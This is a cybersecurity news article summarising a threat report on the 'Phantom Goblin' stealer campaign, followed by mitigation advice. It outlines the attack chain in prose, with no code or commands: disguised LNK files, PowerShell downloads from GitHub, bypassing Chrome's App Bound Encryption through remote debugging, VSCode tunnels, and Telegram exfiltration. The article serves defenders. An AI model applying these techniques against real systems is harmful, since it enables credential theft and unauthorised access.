Phantom Goblin Exploits Social Engineering to Spread Stealer Malware

A sophisticated malware operation, dubbed “Phantom Goblin,” has been identified by cybersecurity researchers at Cyble.

This operation leverages social engineering tactics to distribute information-stealing malware, primarily targeting web browsers and developer tools for data theft and unauthorized system access.

The malware is distributed via RAR attachments containing a malicious LNK file disguised as a PDF document.

Once executed, this LNK file triggers a PowerShell command that retrieves additional payloads from a GitHub repository.

These payloads include binaries named “updater.exe,” “vscode.exe,” and “browser.exe,” which are designed to mimic legitimate applications.

The malware ensures persistence by adding a registry entry, allowing it to execute scripts from the GitHub repository every time the system starts.

Malware Capabilities and Techniques

Phantom Goblin employs several techniques to evade detection and steal sensitive information.

It forcefully terminates browser processes to extract cookies and login credentials from Chrome, Brave, Edge, and other browsers.

The malware uses remote debugging to bypass Chrome’s App Bound Encryption (ABE), allowing it to access and exfiltrate sensitive data without user detection.

Additionally, it establishes a Visual Studio Code (VSCode) tunnel to maintain unauthorized remote access to compromised systems.

According to CRIL Report, this VSCode tunnel enables threat actors to control systems without triggering traditional security alerts, as it uses legitimate VSCode binaries to blend in with normal system operations.

The malware also collects a wide range of browser-related data, including browsing history, visited websites, login credentials, and installed extensions.

This data is organized into JSON files and archived before being transmitted to a Telegram channel using the Telegram Bot API.

The use of Telegram for data exfiltration allows the threat actors to receive stolen information remotely without direct interaction, ensuring stealthy data transfer and persistence.

Recommendations for Mitigation

To protect against Phantom Goblin and similar threats, users should avoid opening unexpected RAR or ZIP attachments and enable advanced email filtering to block potentially malicious files.

Deploying robust endpoint protection with real-time threat detection can help identify malicious processes and suspicious file downloads.

Restricting the use of PowerShell and enforcing strict access controls for VSCode tunnels are also recommended.

Monitoring outbound network traffic for unusual Telegram API activity or untrusted external servers can help detect and prevent data exfiltration attempts.

By implementing these measures, organizations can significantly reduce their vulnerability to such sophisticated cyber threats.

Also Read: